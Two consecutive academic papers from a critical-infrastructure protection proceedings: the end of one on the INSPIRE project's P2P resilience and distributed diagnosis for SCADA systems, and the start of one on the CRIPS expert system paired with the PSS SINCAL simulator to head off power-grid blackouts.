INSPIRE we consider interconnected SCADA systems where the network topology is typically a mesh of heterogeneous tree-based single SCADA systems. The tree topology is usually seen in isolated SCADA systems and thus not used here. Furthermore, modern wireless SCADA systems allow for spontaneous networking allowing for dynamic/evolvable and large-scale topologies. The considered meshed SCADA systems typically show strong heterogeneities in both communication nodes and links. Their reliance on COTS and open components increases the number of threats and cyber attacks they are opposed to. In addition, operational perturbations such as dynamic topology and environmental failures may occur. In case of perturbations and attacks the real-time SCADA data may get either lost or invalid, which may lead to catastrophic consequences. This highlights the need for a middleware that can run on top of various exiting infrastructures and is high scalable and resilient to perturbation (both failures and attacks) by providing for self-organization and self-healing. The P2P architectures are well suited for such network topologies. We will proceed progressively by considering an overlay network initially connecting the central rooms, and subsequently involving RTUs. The type of P2P architecture that we believe to be appropriate for SCADA systems is a closed P2P system [1]. This is useful as policies specifically control access to the overlay and impose dedicated rules for inter-node communication (such as on the topology, i.e. the node degree and the neighborhood). In order to provide for a controlled/predictive communication environment, we believe the structured and
112
S. D’Antonio et al.
hybrid P2P [2] to be more applicable for inter-SCADA linkages than unstructured or classical P2P. The hybrid architecture is characterized by a partial reliance on a central server, which can be utilized for critical operations such as strict identity management and access control. Deploying a structured P2P overlay in SCADA systems furthermore limits the overhead traffic and a consequence is the simplification of the security of the overlay. As we plan to tag, prioritize and limit the P2P-related traffic, the perturbations to the SCADA application traffic can be easily controlled. In addition to considering a closed, structured and hybrid P2P system (and in order to minimize new vulnerabilities from getting introduced) we plan to derive a threat model for P2P-enabled SCADA systems identifying potential vulnerabilities and designing counter-measures for them while learning from existing experiences [3][4][5][6][7][8][9]. INSPIRE aims at adopting P2P architecture to SCADA systems to enhance their resilience to operational perturbations or deliberate breaches. Our main objective is to maintain full or partial functionality (graceful degradation) after failures or attacks. Hereby, we focus on the main SCADA operation and the system responsiveness, i.e., the timeliness and reliability of the delivery of sensor data and actuator commands (see our example of re-routing after a DoS attack). In INSPIRE we will focus on path and data redundancy, easily provided by the P2P architecture, as main techniques to maintain the required responsiveness. In particular, we plan to design mechanisms for multi-path P2P routing and for secure distributed storage of SCADA data allowing for fault-tolerant data transport that meets the reliability and timeliness requirements of the application. Furthermore, we plan to investigate further uses of the deployed P2P overlay such as the support for failure diagnosis, QoS provisioning, security and trust management (testing, monitoring etc.) in inter-connected SCADA systems. Overall we will derive best practices and define a domain-tunable framework that can be easily adapted to different SCADA systems. Efforts for coordination between manufacturers, vendors and end-users, are crucial to ensure that INSPIRE outcomes will be successfully considered by these different parties. For example beyond IP, IPsec and Virtual Private Network (VPN) should be supported in future SCADA products. We identify some preliminary efforts to apply P2P concepts for the protection of SCADA critical infrastructures [10], however, a more systematic and excessive investigation is still missing and will be carried on in INSPIRE in order to provide for resilient communication and control for interconnected critical infrastructures.
3 Development of Diagnosis and Recovery Techniques for SCADA Systems In a SCADA system, the availability of dependable (i.e. accurate and timely) diagnostic mechanisms is paramount. The diagnostic process must be able to clearly identify the damaged components and to assess the extent of damage in individual components in order to determine the effective fault/intrusion treatment and system reconfiguration actions (based on the adjudged causes of system misbehaviour). It is also important to determine when such actions should be performed (in order to maximize their beneficial effects, while limiting the impact on the quality of the delivered service). Although diagnosis in distributed systems has been extensively studied, its application
INcreasing Security and Protection through Infrastructure REsilience
113
to SCADA systems raises a variety of issues which have not been comprehensively addressed before. Such issues stem from a number of inter-related factors, which are briefly described in the following: – First, the system architect is typically a system integrator. As such, he/she has limited limited knowledge of the internal mechanisms of individual components and subsystems; – Second, individual components (such as RTUs) are heterogeneous, whereas the targets of traditional diagnosis are – to a large extent – homogeneous; – Third, diagnostic activities must be conducted with respect to components which are large grained, whereas traditional applications typically consist of relatively fine grained components; – Fourth, repair or replacement of system units is costly and in some cases not possible at all (e.g. due to stringent requirements in terms of continuity of service). One-shot collection of a syndrome, typical of traditional diagnostic models [11], is not effective. Threshold-based mechanisms [12] – which have proved beneficial, especially in on-line diagnosis – fail to capture the complexity of interdependencies among individual sub-systems. We claim that, in order to be effective for SCADA systems, diagnostic activities must i) collect data on individual components behaviour over time [21], ii) correlate events which are observed at different architectural levels, and iii) identify event patterns which represent or precede system failures. To this end, centralized data collection and processing is not a viable option. In INSPIRE, we propose a distributed approach to SCADA systems diagnosis. One of the outputs of the INSPIRE project will be the definition of a distributed diagnosis framework, which will process in real-time the information produced by multiple data feeds which are scattered all over the system. In order to do so, the diagnostic system will have to deal with diverse, heterogeneous sources and formats. Attempting to define a common format or to implement adapters per format would not be viable. The proposed system will be able to generate parsers for specific data feeds automatically from grammar on a per-format basis [19] . Collected data will then be processed using Complex Event Processing (CEP) technologies, such as Borealis [20]. The types of faults/attacks that will be considered include: – Denial Of Service (DOS) and Distributed Denial Of Services (DDOS) attacks DOS attacks aim at lowering the availability of a service by preventing legitimate users from access it. DDOS attacks are a mutation of DOS attacks, where attacking actions are performed against the target host or service by multiple sources in a coordinated manner [13]. – Data Validation attacks - These attacks come from poor validation of data provided by external sources. Sloppy validation of externally supplied data can lead to the whole system being compromised, such as in the case of Buffer Overflow attacks. – Passive attacks - A passive attack is conduced by an eavesdropper who exploits information leaks in the system. A passive attacker may compromise secrecy by exploiting covert channels, as in the case of timing attacks [14]. – Spoofing attacks - These kind of attacks are accomplished by an attacker who impersonates a legitimate user or system to gain an illegitimate advantage.
114
S. D’Antonio et al.
– Hardware faults - These are faults stemming from instabilities of the underlying hardware platform, which manifest as errors at the software level [15]. We will limit our attention to intermittent and transient faults, since these are by far predominant [16]. – Software aging faults - Software aging is a phenomenon, usually caused by resource contention, which can lead to server hangs, panic, or crashes. Software aging mechanisms include memory bloating/leaks, unreleased file locks, accumulation of unterminated threads, shared-memory-pool latching, data corruption/round off accrual, file-space fragmentation, thread stack bloating and overruns [17]. Recent studies [18] have shown that software aging is a major source of application and system unavailability. Software aging faults may still be present in the code base. As an example, a legacy application may exhibit memory leakage problems. A memory leak can go undetected for years if the application and/or the system is restarted relatively often (which might well be the case of a legacy application). The fault/intrusion-treatment logic, which we will propose, will trigger recovery actions according to a least-costly-first strategy. Example of recovery strategies, each one tailored to a specific class of errors/attacks, are: – Restart of the component - This action can cure inconsistent component states (such as corrupted data structures), but it has no effect on errors which have propagated to the rest of the infrastructure. – Reboot of the interconnection infrastructure - This action can fix erroneous states of the communication channels, but again it has no effect on errors which have propagated to the rest of the infrastructure. – Restoration of stored data - Since multiple copies of relevant data may exist, attempts can be done to correct errors in the stored data. Techniques will be developed for properly chaining/combining alternative diagnostic mechanisms. This will improve the performance of the diagnostic system, by increasing the coverage while reducing false positives.
4 Related Work In this section the main research initiatives in the area of Critical Information Infrastructure Protection are presented by emphasizing potential relationships with INSPIRE. 4.1 The IRRIS Project IRRIS (Integrated Risk Reduction of Information-based Infrastructure Systems) is a EU Integrated Project aiming at protecting Large Complex Critical Infrastructures (LCCIs) like energy supply or telecommunication, increasing dependability, survivability and resilience of underlying information-based infrastructures governing LCCIs themselves. The main objectives of the IRRIS project are to: – Determine a sound set of public and private sector requirements based upon detailed scenario and data analysis.
INcreasing Security and Protection through Infrastructure REsilience
115
– Develop MIT (Middleware Improved Technology), a collection of software components, which facilitates IT-based communication between different infrastructures and different infrastructure providers. – Build SimCIP (Simulation for Critical Infrastructure Protection), a simulation environment for controlled experimentation with a special focus on CIs interdependencies. The simulator will be used to deepen the understanding of critical infrastructures and their interdependencies, to identify possible problems, to develop appropriate solutions and to validate and test the MIT components. There are two kinds of MIT components: MIT communication components to enhance the communication between various infrastructures and infrastructure providers and MIT add-on components with some kind of build-in intelligence. The add-on components will monitor data flowing within and between the infrastructures and raise alarm in case of intrusions or emergencies and take measures to avoid cascading effects. They will be able to detect anomalies, filter alarms according to their relevance and support recovery actions and will thus contribute to the security and dependability of CIs. 4.2 The CRUTIAL Project CRUTIAL (CRitical UTility InfrastructurAL Resilience) is an European IST research project, approved from EU within the Sixth Framework Programme (FP6). The Project addresses new networked ICT systems for the management of the electric power grid, in which artifacts controlling the physical process of electricity transportation need to be connected with information infrastructures, through corporate networks (intranets), which are in turn connected to the Internet. CRUTIAL’s innovative approach resides in modeling interdependent infrastructures taking into account the multiple dimensions of interdependencies, and attempting at casting them into new architectural patterns, resilient to both accidental failures and malicious attacks. The objectives of the project are: – investigation of models and architectures that cope with the scenario of openness, heterogeneity and evolvability endured by electrical utilities infrastructures; – analysis of critical scenarios in which faults in the information infrastructure provoke serious impacts on the controlled electric power infrastructure; – investigation of distributed architectures enabling dependable control and management of the power grid. CRUTIAL looks at the improvement of the CI protection mainly focusing on their information systems, on their multi-dimensional interdependencies and attempting at casting them into new architectural patterns, resilient to both accidental failures and malicious attacks. Minor attention seems to be paid to the communication part. It is worth noting that the objectives of CRUTIAL and INSPIRE are not redundant but on the contrary they complete each other. Furthermore the approach of CRUTIAL that considers the CI information systems interconnected by means of corporate networks (intranets) which are in turn connected to the Internet, exactly goes in the direction that INSPIRE has identified as a market trend, where information systems controlling the critical infrastructures are interconnected by means of commodity infrastructures.
116
S. D’Antonio et al.
4.3 The DESEREC Project DESEREC is an Integrated Project of the Sixth Framework Programme of the European Union in the thematic area ”Information Society Technologies”, subprogramme area ”Towards a global dependability and security framework”, with the objective to define a framework to increase the dependability of existing and new networked Information Systems by means of an architecture based on modelling and simulation, fast reconfiguration with priority to critical activities and incident detection and quick containment. 4.4 The SecurIST Project SecurIST is a project whose main objective is to deliver a Strategic Research Agenda for ICT Security and Dependability Research and Development for Europe. The Strategic Research Agenda to be developed by the Security taskforce will elaborate the ICT Security and Dependability Research strategy beyond 2010. It will provide Europe with a clear European level view of the strategic opportunities, strengths, weakness, and threats in the area of Security and Dependability. It will identify priorities for Europe, and mechanisms to effectively focus efforts on those priorities, identifying instruments for delivering on those priorities and a coherent time frame for delivery. 4.5 The RESIST Project RESIST (Resilience for survivability in ICT) is a FP6 Network of Excellence that addresses the strategic objective ”Towards a global dependability and security framework” of the EU Work Programme, and responds to the stated ”need for resilience, selfhealing, dynamic content and volatile environments”. It integrates leading researchers active in the multidisciplinary domains of Dependability, Security, and Human Factors, in order that Europe will have a well-focused coherent set of research activities aimed at ensuring that future ”ubiquitous computing systems”, the immense systems of everevolving networks of computers and mobile devices which are needed to support and provide Ambient Intelligence (AmI), have the necessary resilience and survivability, despite any residual development and physical faults, interaction mistakes, or malicious attacks and disruptions. The objectives of the Network are: – integration of teams of researchers so that the fundamental topics concerning scalable resilient ubiquitous systems are addressed by a critical mass of co-operative, multi-disciplinary research; – identification, in an international context, of the key research directions (both technical and socio-technical) induced on the supporting ubiquitous systems by the requirement for trust and confidence in AmI; – production of significant research results (concepts, models, policies, algorithms, mechanisms) that pave the way for scalable resilient ubiquitous systems; – promotion and propagation of a resilience culture in university curricula and in engineering best practices.
INcreasing Security and Protection through Infrastructure REsilience
117
Besides the above mentioned initiatives we would like to briefly present also CI2RCO. The main objective of the Critical Information Infrastructure Research Co-ordination project is to create a European taskforce to encourage a co-ordinated Europe-wide approach for Research and Development on Critical Information Infrastructure Protection (CIIP), and to establish a European Research Area (ERA) on CIIP as part of the larger Information Society Technologies (IST) Strategic Objective to integrate and strengthen the ERA on Dependability and Security.
5 Conclusions Supervisory Control And Data Acquisition (SCADA) systems collect and analyze data for real-time control. SCADA systems are extensively used in applications such as electrical power distribution, telecommunications, and energy refining. The connectivity of SCADA networks with outside networks is a relevant aspect which is leading to an increasing risk of cyber-attacks and a critical need to improve the security of these SCADA networks. In this paper we presented the INSPIRE project, which aims at ensuring the protection of critical information infrastructure through the design and development of techniques for securing networked process control systems. In particular, two of the INSPIRE objectives are (i) to adopt P2P architecture to SCADA systems to enhance their resilience to operational perturbations or deliberate breaches and (ii) to design and develop a distributed diagnosis framework, which processes in a real-time fashion the information produced by multiple and heterogeneous data feeds. To prove the effectiveness of the developed solutions a working prototype of the INSPIRE framework will be implemented as a final demonstrator of selected scenarios.
References 1. Seungtaek, O., et al.: Closed P2P system for PVR-based file sharing. IEEE Transactions on Consumer Electronics 51(3) (2005) 2. Keong, L., et al.: A survey and comparison of peer-to-peer overlay network schemes. IEEE Communications Surveys and Tutorials (2005) 3. Wallach, D.S.: A survey of peer-to-peer security issues. In: Okada, M., Pierce, B.C., Scedrov, A., Tokuda, H., Yonezawa, A. (eds.) ISSS 2002. LNCS, vol. 2609, pp. 42–57. Springer, Heidelberg (2003) 4. Liang, J., Naoumov, N., Ross, K.: The Index Poisoning Attack on P2P File-Sharing Systems. In: Proc. of INFOCOM 2006 (2006) 5. P2P or Peer-to-Peer Safety, Privacy and Security. Federal Trade Commission (2004), http://www.ftc.gov/os/comments/p2pfileshare/OL-100005.pdf 6. Risson, J., Moors, T.: Survey of Research towards Robust Peer-to-Peer Networks: Search Methods. Technical Report UNSW-EE-P2P-1-1, University of New South Wales, Sydney (2004) 7. Mudhakar, S., Ling, L.: Vulnerabilities and security threats in structured overlay networks: A quantitative analysis. In: Proc. of the 20th Annual Computer Security Applications Conference (ACSAC) (2004) 8. Honghao, W., Yingwu, Z., Yiming, H.: An efficient and secure peer-to-peer overlay network. In: Proc. of the IEEE Conference on Local Computer Networks (2005)
118
S. D’Antonio et al.
9. Friedman, A., Camp, J.: Peer-to-Peer Security, Harvard University (2003), http://allan.friedmans.org/papers/P2Psecurity.pdf 10. Duma, C., Shahmehri, N., Turcan, E.: Resilient Trust for Peer-to-Peer Based Critical Information Infrastructures. In: Proceedings of 2nd International Conference on Critical Infrastructures (CRIS) (2004) 11. Mongardi, G.: Dependable Computing for Railway Control Systems. In: Proceedings of DCCA-3, Mondello, Italy, pp. 255–277 (1993) 12. Bondavalli, A., Chiaradonna, S., Di Giandomenico, F., Grandoni, F.: Threshold-Based Mechanisms to Discriminate Transient from Intermittent Faults. IEEE Transactions on Computers 49, 230–245 (2000) 13. Mirkovic, J., Martin, J., Reiher, P.: A Taxonomy of DDoS Attacks and DDoS Defense Mechanisms. UCLA Computer Science Department, Technical report N.020018 14. Kocher, P.C.: Timing Attacks on Implementations of Diffie-Hellman, RSA, DSS, and Other Systems. In: Koblitz, N. (ed.) CRYPTO 1996. LNCS, vol. 1109, pp. 104–113. Springer, Heidelberg (1996) 15. Goswami, K.K., Iyer, R.K.: Simulation of Software Behavior Under Hardware Faults. In: Proceedings of the 23rd Annual International Symposium on Fault-Tolerant Computing (1993) 16. Iyer, R.K., Tang, D.: Experimental Analysis of Computer System Fault Tolerance. In: Pradhan, D.K. (ed.) Fault-Tolerant Computer System Design, ch. 5. Prentice Hall Inc., Englewood Cliffs (1996) 17. Cassidy, K.J., Gross, K.C., Malekpour, A.: Advanced Pattern Recognition for Detection of Complex Software Aging Phenomena in Online Transaction Processing Servers. In: Proceedings of International Conference on Dependable Systems and Networks (2002) 18. Huang, Y., Kintala, C.M.R., Kolettis, N., Fulton, N.D.: Software Rejuvenation: Analysis, Module and Applications. In: FTCS 1995, pp. 381–390 (1995) 19. Campanile, F., Cilardo, A., Coppolino, L., Romano, L.: Adaptable Parsing of Real-Time Data Streams. In: Proceedings of 15th Euromicro International Conference on Parallel, Distributed, and Network-based Processing (PDP 2007) (February 2007) 20. Borealis Distributed Stream Processing Engine, http://www.cs.brown.edu/research/borealis/public/ 21. Serafini, M., Bondavalli, A., Suri, N.: On-Line Diagnosis and Recovery: On the Choice and Impact of Tuning Parameters. IEEE Transactions on Dependable and Secure Computing (October 2007)
Increase of Power System Survivability with the Decision Support Tool CRIPS Based on Network Planning and Simulation Program R PSSSINCAL Christine Schwaegerl1, Olaf Seifert1 , Robert Buschmann2 , Hermann Dellwing2 , Stefan Geretshuber2 , and Claus Leick2 1 2
Siemens AG, Freyeslebenstrasse 1, 91058 Erlangen, Germany {christine.schwaegerl,olaf.seifert}@siemens.com IABG mbH, Einsteinstrasse 20, 85521 Ottobrunn, Germany {buschmann,dellwing,geretshuber,leick}@iabg.de
Abstract. The increased interconnection and automation of critical infrastructures enlarges the complexity of the dependency structures and - as consequence - the danger of cascading effects, e.g. causing area-wide blackouts in power supply networks that are currently after deregulation operated closer to their limits. New tools or an intelligent combination of existing approaches are required to increase the survivability of critical infrastructures. Within the IRRIIS project the expert system CRIPS was R developed based on network simulations realised with PSSSINCAL, an established tool to support the analysis and planning of electrical power, gas, water or heat networks. CRIPS assesses the current situation in power supply networks analysing the simulation results of the physical network behaviour and recommends corresponding decisions. This paper describes the interaction of the simulation tool R PSSSINCAL with the assessment and decision support tool CRIPS; a possible common use-case is outlined and benefits of this application are shown. Keywords: Power supply network, planning, simulation, situation assessment, decision making, emergency management, expert system.
1
Introduction
The main goal of the European project IRRIIS (Integrated Risk Reduction of Information-based Infrastructure Systems) [1] is to develop so called Middleware Improved Technology (MIT) components to support the control of power and telecommunication networks in order to mitigate the danger of blackouts in these networks. With open access to deregulated markets increased power transfers are forcing the transmission systems to its limits. Renewable and dispersed generation supported with priority interconnection and access to the network according to R. Setola and S. Geretshuber (Eds.): CRITIS 2008, LNCS 5508, pp. 119–130, 2009. c Springer-Verlag Berlin Heidelberg 2009
120
C. Schwaegerl et al.
legislation in almost all European countries additionally leads to network congestions, especially by large wind farms that are located i.e. in the North Sea far from load centres or by high shares of dispersed generation units in distribution networks that may reverse power flows. To achieve higher economic objectives the systems are also operated closer to their limits partly supported by increased network automation (monitoring and control) also known as smart grids. As a result unexpected events, weak interconnections, high loading of lines, protection malfunction or problems with data transmission may cause the systems to loose stability - possibly leading to catastrophic failures or blackouts as can be seen by the increased number of blackouts during the last years. An increased number of stakeholders since deregulation of the energy markets with different responsibilities along with high shares of dispersed and renewable generation units also raise the danger of blackouts in distribution systems; thus intelligent software solutions are also required on distribution level. Many control and simulation systems for transmission and partly distribution systems already exist for this purpose - special systems for control and systems which can be used as a “further support”. But, these systems are only dedicated to a special task such as estimation of power flows in the networks, and don’t consider dependencies from other critical infrastructures or neighboured utilities also participating in energy supply tasks. 1 R The PSSSINCAL [2] program for system analysis and planning has been created to simulate, display and evaluate steady - state and dynamic behaviour of power transmission and distribution systems. It calculates power flows in these networks based on the data of the components corresponding to physical laws. CRIPS2 [3] is one of so called “MIT-add-on-components” which are developed in frame of the IRRIIS project. It is realized as an expert system to support the assessment of the current situation - in the case of this paper - in power networks and - as a conclusion of this assessment - to assist the network operator in early detection of and decision making in emergency situation. CRIPS primary does not use directly physical-engineer-knowledge, its knowledge base represents the experience resulting from the operating of the system and corresponding crisis management exercises. Both systems - one system operating on the physical level and one system operating on a “meta-physical level” - should be combined in the sense of: Installation and operation of a power system is based on physical laws, but not all problems in power networks can be “reached” by physical laws. R Thus, a combination of PSSSINCAL with CRIPS seems to be very effective for the crisis management in the operation of power networks to “mitigate the danger of large blackout”. 1 2
R is a registered trademark of Siemens AG comprising a comprehensive power PSS system simulation suite. Crisis Prevention and Planning System.
Increase of Power System Survivability
2
121
Subject Area
The technical part of subject area is limited to the steady state and dynamic simulation of electrical power flows. The meta-technical part of the subject area assesses of the current situation and supports resulting decisions, using particularly experiences and lessons learned - a way to take into account the complex dependencies, which exist in critical infrastructures. 2.1
Simulation of the Power Flow
Time-dependent bottlenecks in a power system can be determined by a steady state analysis such as power flow analysis that determines loading in the network elements such as lines (cables and overhead lines) or transformers as well as voltages in the nodes of the network. This information strongly depends on available power generation, current loads in the network as well as current operation of the network i.e. with planned maintenance and can then be used for the immediate assessment of the current situation. Dynamic simulations support to analyse voltage and phase-angle stability in transmission networks. 2.2
Assessment of the Current Situation
The assessment of the current situation in the power network should be more precisely characterized as “strategic assessment” of the current situation: Not a normal day-to-day problem is to be identified, but the aim is to identify in advance a situation, which can cause an area wide blackout of power supply. Thus, not every possible overload - perhaps dangerous for a part of the power network - has its representation in the knowledge base. Only critical situations which can cause cascading effects and a wide area blackout as result are considered by corresponding rules in the knowledge base. The source of this knowledge are basic rules that must be met for a stable network operation, the long-term experience with the operation of the grid, the content of emergency plans, the results of crisis management exercises or lessons learned of already happened blackouts. The assessment of the current situation is to answer the question: Identified risks can be accepted or not with regard to avoid the danger of a wide area blackout in the power supply grid? 2.3
Decision Making
How to deal with an identified critical situation that can cause an area wide blackout? A canonical decision may be to calculate immediately the compliance with the (n − 1)-criterion in the network where it is checked if an outage of an arbitrary network element may lead to unacceptable network conditions. Observance of this (n−1)-criterion permits the provision of adequate service reliability (continuity of supply) for all network users, secure power transfers, and provision of system services. The (n − 1)-criterion addresses all issues relating to network
122
C. Schwaegerl et al.
technology, in particular the system services to be provided (e.g. voltage stability including provision of reactive power), equipment utilization, the protection concept, and where applicable, stability issues. Further decisions (or measures) are possible such as: – Network related measures, for example switching on or off selected lines can have the effect, that a critical loading situation of some lines can be resolved due to changed load flows and so a decrease of the danger is possible - but you have to know, in what situation such a measure is successful and what lines should be switched. These measures can be done without further costs. – Market related measures, for example redispatch or activation of additional reserves (additional generation). These measures usually cause further costs. – Emergency measures. These measures (automatically switching off a large number of consumers, disconnecting a wide area from power supply, etc.) have effects to a large number of customers with different negative socioeconomic impacts. These decisions resp. measures are not obvious: The experience of exercises or the lessons learned resulting from already happened critical situations have to be taken into account - this knowledge is implemented as facts and rules in the knowledge base of the expert system CRIPS. Decision support - taking into account dependencies - is to answer the question What decisions lead to a decrease of a critical situation? 2.4
General Spectrum of CRIPS Tasks
CRIPS is designed to deal with dependency structures, which cannot be described completely by deterministic - e.g. physical - laws, resp. by corresponding methods. It shall provide an additional functionality to integrate knowledge and know how of experts, resulting from experience, lessons leaned, etc. This kind of knowledge is represented by heuristic methods and this is the reason, why CRIPS is based on an expert system (see Section 4.2 for details about the structure of the knowledge base). So the characterizing quality of CRIPS is not its special application, but the method of representation and evaluation of knowledge and so the general application is not restricted to the special application, which is described in this paper. A more general application can be described by Evaluation of Interdependencies between different systems resp. critical infrastructures such as power supply and telecommunication networks. It is assumed, that the heuristic approach to describe interdependencies between systems such as telecommunication, networks, power supply networks, gas pipeline systems, which are based on different physical laws, is suitable to deal with those complex and complicate dependency structures. Figure 1 gives an impression of the more general application field, independent from a special system resp. critical infrastructure.
Increase of Power System Survivability
123
Fig. 1. CRIPS - General Spectrum of Tasks
3 3.1
R Simulation with PSSSINCAL
Introduction
R PSSSINCAL is well suited for the needs of both industry and utility companies. Typical user groups include municipal power companies, regional and national system operators, industrial plants, power stations and engineering R consulting companies. PSSSINCAL provides the system planner with highperformance tools for planning and design of supply networks for a variety of critical infrastructures - for gas, district heating, electrical power and water. It comprises powerful tools necessary for examining any network states and determining the most suitable network structure in normal and in emergency situations. The impact of switching operations can be analysed and networks can be optimized with regard to losses and utilization.
3.2
Main Features
Input data of the networks to be calculated, equipment data and graphics data for true-location or schematic network representation, as well as results of the various calculation methods – all data necessary for system planning – are stored in a commercial data base, so data access is possible by standard methods.
124
C. Schwaegerl et al.
The graphical user interface is the environment in which networks are drawn, defined and updated, calculations are started, results are displayed or data import or export are done. It enables to enter and display networks in true-location or schematic form. The network and additional graphic information can be drawn and organized in different graphical layers. Different variants can be conveniently R handled by PSSSINCAL’s variant management tool. Various steady-state and dynamic calculation methods are available. It is also possible to simulate the effect of time series (e.g. load curves) or time events (e.g. open circuit) on the network. Calculation results can be depicted in different ways (e.g. tables, screen forms, diagrams and reports) and evaluated in the network diagram by means of colouring in accordance to predefined criteria. For instance, “traffic-light colours” can indicate the state of system elements. R The macro function of PSSSINCAL enables the connection and synchronised calculation of separate networks. Furthermore, it enables the use of separately defined type databases in different network areas. The variant management tool organizes variants in a tree-structure. Changes are automatically applied to subordinated variants. Each variant can be loaded, displayed and evaluated independently. The program system possesses computer network capability, i.e. IT resources such as printers, data security systems, etc. can be utilised. If required, data and results can be made accessible to other users. R PSSSINCAL is easy to integrate in any data environment because it is a “database application”. – Several Import and Export facilities are available based on ASCII-files, such R R as PSSE raw file (incl. graphics), PSSNETOMAC, UCTE, DVG,. . . – A data import interface via SQL is provided – Even a simple-to-use EXCEL import can be used to get data (balanced or R unbalanced domain data and even graphics) into PSSSINCAL – A standard CIM (Common Information Model on basis of XML) import and export is embedded R – PSSSINCAL’s complete data base model is released to the user community in order to support users to program their own interface to other software or develop or add-on their own applications. 3.3
Simulation of Electrical Networks
A wide range of modules such as Power flow, Short circuit, Stability (RMS), Electromagnetic transients (EMT), Eigenvalues/modal analysis, Harmonics, Protection simulation, Contingency analysis, Reliability or Cost analysis allow almost all network-related tasks to be performed, such as operational and configuration planning, fault analysis, harmonic response, protection simulation and protection coordination. Several of the modules, especially those connected with protection systems, are also ideal for training purposes. The power flow calculation determines weak points of the network. Different algorithms such as Newton-Raphson, or current iteration are available for calculating the distribution of currents, voltages and loads in the network, even under
Increase of Power System Survivability
125
difficult circumstances, such as when several infeeds, transformer taps and poor supply voltages are involved. The graphical evaluation comprises e.g. – Display of overloaded system elements or isolated network parts – Display of selected network regions which are of interest (not every element must have a graphical representation); text only at interesting elements – Coloured network diagrams with selected results – Diagrams (e.g. voltage profile) showing the results for selected paths through the network can be created In a first step, all data concerning power system and power of the transmission network has to be collected for further analysis during system study. Essential data for this purpose are generator data incl. data of controllers and governors, line data (cable, overhead line), transformer data, or load data.
4 4.1
Support of Assessment and Decision Making by CRIPS Paradigm
The current situation in a power network is presented in control centres of the system operators. The results of a simulation - e.g. to confirm compliance with the (n − 1)-criterion - are additional information. It has to be stated, that the operator has no explicit information, whether a situation, presented at his monitor, is critical in the sense of “this situation can cause a wide-area blackout”: overloads can cause automatic switch offs of lines and those switch offs itself can cause further components out of work and the end of this cascade is perhaps a local outage of power supply or a wide-area blackout, which is not acceptable. This is the topic of the assessment supported by CRIPS (see Section 2.2): Assessment of data and information about the grid with regard to the danger of an area wide blackout (critical situation) The main scope of the decision support of CRIPS is not the support of day-today decisions; the main scope is the support of Making the right decision at the right time to stop the development of an identified critical situation towards a wide area blackout based on experience of experts resulting from lessons learned of still happened blackouts or crisis management exercises. 4.2
Method
CRIPS shall ensure an “automatic availability” of expert knowledge concerning the assessment of the current situation in the networks and the corresponding decision making in case of detected critical situations (see chapter 6). This knowledge usually is a heuristic knowledge and its canonical representation is a system of if-then-else-rules. So the core of CRIPS is an expert system, and the rule based representation of the knowledge takes into account the following experience (see [4], page 276):
126
C. Schwaegerl et al.
“. . . knowledge bases from the real world often only include restricted clauses, so-called horn clauses . . . ”: A1 ∧ A2 ∧ A3 ∧ . . . ∧ An ⇒ B
(1)
(1) describes horn clauses in an understandable way. It seems to be a very simple and restricted formalism to describe knowledge. Of course, there may be some restrictions concerning the knowledge representation, but this formalism ensures a very effective and consistent maintenance of the knowledge base, which is necessary when there are essential changes in the networks. So the basic structure of the knowledge base of CRIPS can be described by these “prototypical rules”: If data of components /= then critical situation is given If critical situation is given then decision is recommended
(2) (3)
Despite this simple but maintainable knowledge base, we can assume – taking into account [4] and experiences of other expert system developments: With such a simple structured rule system a sufficient support of the situation assessment and decision making is possible. So this method guarantees “sufficient support” and “effective maintenance”.
5 5.1
R Basics of the Interaction PSSSINCAL - CRIPS R Simulation and Analysis with PSSSINCAL
Results of simulations are stored in data bases with graphical representation:
Fig. 2. Example for the Visualisation of Load flow Simulation Results
5.2
Situation Assessment and Decision Support with CRIPS
The assessment and the resulting decision support aredone in the following way: – Caused by a special event or periodically an operator of a control center R does a simulation with PSSSINCAL - e.g. an (n − 1)-criterion compliance calculation of a grid or of a part of it, a load analysis of lines, etc.
Increase of Power System Survivability
127
– Via interface the resulting values of the power flow simulation are available to CRIPS - no physical load flow results are transferred, only data which are indicators for a critical situation. – CRIPS contains rules about “indicator components”3 for critical situations. The evaluation of the simulation data perhaps indicates a critical situation. – Depending on the critical situations decisions are recommended The CRIPS-procedure - called “CRIPS Guard” - is working like a virus scanner on a computer system and the results are presented as follows: R CRIPS Guard evaluates permanently the result-tables of PSSSINCAL in order to find a critical situation. If such a situation occurs, CRIPS generates permanently corresponding messages resp. proposed decisions.
This kind of assessment and decision support is not an automatism: The operator only receives a message about the situation and proposed, recommended, or possible decisions but, he makes “final decision”.
Fig. 3. Assessment and Decision Support with CRIPS
Figure 3 shows a scanning procedure of CRIPS. This kind of output - to show all steps of the whole scanning process - shall only demonstrate the functionality. CRIPS as operational system works - like a virus scanner - in the background and only significant results are presented. What is shown on the Monitor of the CRIPS Guard: – At the beginning of the scanning (12:59:36) there is no critical situation identified, and so there are no recommended decisions. – Then - because of changes in the grid - CRIPS finds a critical situation (and can give further explanations if wanted). 3
At the moment so called “indicator components” are used to make the assessment. The use of further criteria - not depending on the status of those indicator components - is in work.
128
C. Schwaegerl et al.
– Decisions are recommended, in this case one “grid related measure” and one “market related measure”. – Scanning continues: The critical situations and the recommended measures are indicated until there is a change in the grid (e.g. by an operator). 5.3
The Procedure in Detail – A Generic Example
The example is based on the topology of an existing 110/20 kV network that was chosen as one scenario for further analysis in the IRRIIS project (Fig. 4).
R Fig. 4. Network Topology for Blackout-sequence Simulation by PSSSINCAL
We assume a sequence of events which may be – a real time development in the grid - shown on the monitors in control centres; R – a weak point analysis of the grid, done with PSSSINCAL (see Sect. 3.3). It may be an action of a crisis management exercise – and the documentation of the results provides new rules in the knowledge base of CRIPS. The following sequence of events for the network given in Fig. 4 (without techR nical details ) simulated with PSSSINCAL leads to a blackout:
Increase of Power System Survivability
129
Line L1 switched off because of thunder storm T0 Line L25 automatically switched off by protection device T1 = T0 + 5 min Line L7 automatically switched off by protection device T2 = T1 + 10 min northern Lines automatically switched off by protection devices T3 = T2 + 5 min ——— “Point of no return - cascading effects” ——— 5. western Lines automatically switched off by protection devices T4 = T3 + 1 sec 6. southern Lines automatically switched off by protection devices T5 = T4 + 1 sec ⇒ Blackout 1. 2. 3. 4.
